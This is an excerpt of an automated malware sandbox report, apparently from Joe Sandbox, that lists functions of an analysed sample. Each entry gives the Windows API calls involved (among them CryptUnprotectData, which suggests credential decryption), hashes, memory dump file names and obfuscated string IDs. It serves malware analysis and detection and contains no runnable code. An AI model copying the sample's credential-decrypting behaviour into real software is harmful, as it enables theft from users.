                                • Instruction ID: b641395d32620b88735eb9f551b91054d56d7dc876884be2d848b3bd8746ade5
                                • Opcode Fuzzy Hash: 199ca6c94a1bc334dd0b975370bf8c525877568ce283042ad4b05667d162b09d
                                • Instruction Fuzzy Hash: 0D11A4B4240308AFEB10CFA4DC95FAA77B5FB89710F208058FA199B390C7B5A901CB90
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,008D0E00,00000000,?), ref: 008C79B0
                                • RtlAllocateHeap.NTDLL(00000000), ref: 008C79B7
                                • GetLocalTime.KERNEL32(?,?,?,?,?,008D0E00,00000000,?), ref: 008C79C4
                                • wsprintfA.USER32 ref: 008C79F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                • String ID:
                                • API String ID: 377395780-0
                                • Opcode ID: 949b9a191c6ce68c5144d7511c079accfb62c5bae6228fafb1c2351883bb47ba
                                • Instruction ID: 5c3804cca728530cf5e8ce2f3a18ae71c9395c0e67d9ae78cec96f4a3e50c617
                                • Opcode Fuzzy Hash: 949b9a191c6ce68c5144d7511c079accfb62c5bae6228fafb1c2351883bb47ba
                                • Instruction Fuzzy Hash: 271115B2904218ABCB14DFC9DD45BBEB7F8FB48B11F10421AF605A2280E2795941CBB1
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,007BDDD0,00000000,?,008D0E10,00000000,?,00000000,00000000), ref: 008C7A63
                                • RtlAllocateHeap.NTDLL(00000000), ref: 008C7A6A
                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,007BDDD0,00000000,?,008D0E10,00000000,?,00000000,00000000,?), ref: 008C7A7D
                                • wsprintfA.USER32 ref: 008C7AB7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                • String ID:
                                • API String ID: 3317088062-0
                                • Opcode ID: b369a71c609f777c3ec865312c570b7269f8c58e66ba1987d0c2ed19f72d3217
                                • Instruction ID: e2f033df22c1af7fedf1aff68cede45c3c5c15541b1bfbc6f08372f121ebed39
                                • Opcode Fuzzy Hash: b369a71c609f777c3ec865312c570b7269f8c58e66ba1987d0c2ed19f72d3217
                                • Instruction Fuzzy Hash: 58117CB1945228EBEB20DB94DC49FA9B778FB04761F10439AE91AD32C0D7745A40CF91
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 1pon$:EQF$vH_?$|qo~
                                • API String ID: 0-364707436
                                • Opcode ID: 398f5174408c888431da34ae7b345716abff1f60dc936ed47b00e32525d9ae88
                                • Instruction ID: 529ce5d176ad8feb83790739d0d80a27c07edaa3e4439a87fd9c0693743e81c7
                                • Opcode Fuzzy Hash: 398f5174408c888431da34ae7b345716abff1f60dc936ed47b00e32525d9ae88
                                • Instruction Fuzzy Hash: 3F62D5F3A082009FD304AE2DDC8566AFBE9EF94760F1A493DEAC4C7744E63598458793
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: CQ`/$hg=W$hg=W
                                • API String ID: 0-3204022285
                                • Opcode ID: b219e3401bdb5852fb0df270c99267286ef52da938f1b958ca38d71668a64242
                                • Instruction ID: 1be05d1e96448b4a583315dc54c1d99ba183f018b0415f809abb586cbee538eb
                                • Opcode Fuzzy Hash: b219e3401bdb5852fb0df270c99267286ef52da938f1b958ca38d71668a64242
                                • Instruction Fuzzy Hash: 76B239F360C204AFE708AE2DEC8567AFBE9EF94320F1A453DE6C4C7744E93558058696
                                APIs
                                • CoCreateInstance.COMBASE(008CE118,00000000,00000001,008CE108,00000000), ref: 008C3758
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 008C37B0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWide
                                • String ID:
                                • API String ID: 123533781-0
                                • Opcode ID: 256d538bf3d8b7cce6c5eddac8bd69acc75fc4dcec89357932fa7b99c9523aa8
                                • Instruction ID: 42c04cb4b172680e9fab2176aff3315d68bcc9f9efc519e2972fe9806feb7d96
                                • Opcode Fuzzy Hash: 256d538bf3d8b7cce6c5eddac8bd69acc75fc4dcec89357932fa7b99c9523aa8
                                • Instruction Fuzzy Hash: E341E970A40A189FDB24DB58CC95F9BB7B5FB48702F4081D8E618E7290E771AE86CF50
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 008B9B84
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 008B9BA3
                                • LocalFree.KERNEL32(?), ref: 008B9BD3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$AllocCryptDataFreeUnprotect
                                • String ID:
                                • API String ID: 2068576380-0
                                • Opcode ID: abf01ece3350aea0d53fe1af236473bc3634faed181ef5fbf95c5fcec2c7452c
                                • Instruction ID: 68cd6b33fb3bdd5f23f480be216053fb119b2edc1759cb8e36cd5e0617d8695a
                                • Opcode Fuzzy Hash: abf01ece3350aea0d53fe1af236473bc3634faed181ef5fbf95c5fcec2c7452c
                                • Instruction Fuzzy Hash: 7411A5B8A00209EFCB04DF94D985AAE77B9FB88300F104598E915AB350D770AE15CFA1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: c$o|
                                • API String ID: 0-2353341362
                                • Opcode ID: 79872127eceff8cb87a2abec9f47afbcd5a739c88abf3c1804ce7a854c815ef0
                                • Instruction ID: 27ff0ae38348b13253545a6e111c13ccb0614e097191950c0b0a499bb1c44770
                                • Opcode Fuzzy Hash: 79872127eceff8cb87a2abec9f47afbcd5a739c88abf3c1804ce7a854c815ef0
                                • Instruction Fuzzy Hash: D6413DF39096049FE300BE3DEC946BABBE5EB94220F164A3DE9C0D3714E63558118B83
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ad14cae63bcbbbfab32913e9a7a49911aa84203af3cf541f4e5433fa64fc5335
                                • Instruction ID: 89d53fc7baf6552c4be212beb1451ee15a442914e4ddfff1d8b1ef8a1bfd4f67
                                • Opcode Fuzzy Hash: ad14cae63bcbbbfab32913e9a7a49911aa84203af3cf541f4e5433fa64fc5335
                                • Instruction Fuzzy Hash: 5E22C5B3A0C600AFE3056E29DC8677AFBE5EF94320F16492DE6C4C7744E63598418B97
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8612e959590d12dd1b1666ebce6094420bf935f2210c623b585a6dd07a04589a
                                • Instruction ID: dcc828d899ffcba401caea310b0310280a87f627dd444836ddeb304ae681709e
                                • Opcode Fuzzy Hash: 8612e959590d12dd1b1666ebce6094420bf935f2210c623b585a6dd07a04589a
                                • Instruction Fuzzy Hash: 0A6103F3A082005FF704AE2DEC8577AB7D5EB94710F0A863DEBC4C7784E93998148686
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7c9566f02f566781deb3a543cb5a405bb70df20ed8cd359794edf5f7cd0035e3
                                • Instruction ID: aa841582b9be0f37f851dc72fc367d38983a2f7275ac543937dfc318131a7651
                                • Opcode Fuzzy Hash: 7c9566f02f566781deb3a543cb5a405bb70df20ed8cd359794edf5f7cd0035e3
                                • Instruction Fuzzy Hash: 4B6114F390C2048FF308AE3DDCAA77ABAD5EB84310F1A453DDAC687784F93959058646
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 279788cfcf28a0f65aacb7877251e8f23bcc2a9ef0f8bac3e579fe4b91a284aa
                                • Instruction ID: bc1c619a9604ad12a6ba54f0f7aa1ddf34e3927b366219206fc997c04ea70ebb
                                • Opcode Fuzzy Hash: 279788cfcf28a0f65aacb7877251e8f23bcc2a9ef0f8bac3e579fe4b91a284aa
                                • Instruction Fuzzy Hash: B4415CF36497052BF300AD2EDC84B6AB7DAEBE8620F2E853DD7C4C3B45E83965068151
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 535645e9a0195915f9fd7dea9be3877d586f309021089d2fefaac47368b86827
                                • Instruction ID: 8894a0d123541f7c3c16d35d8ace99c19bb42fc2f7c946f043b8055d0b8aea2d
                                • Opcode Fuzzy Hash: 535645e9a0195915f9fd7dea9be3877d586f309021089d2fefaac47368b86827
                                • Instruction Fuzzy Hash: 2E4125B390C604DFC3146A28E945639F7E5AB84310F26892EE6DA93280F6718A40B667
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
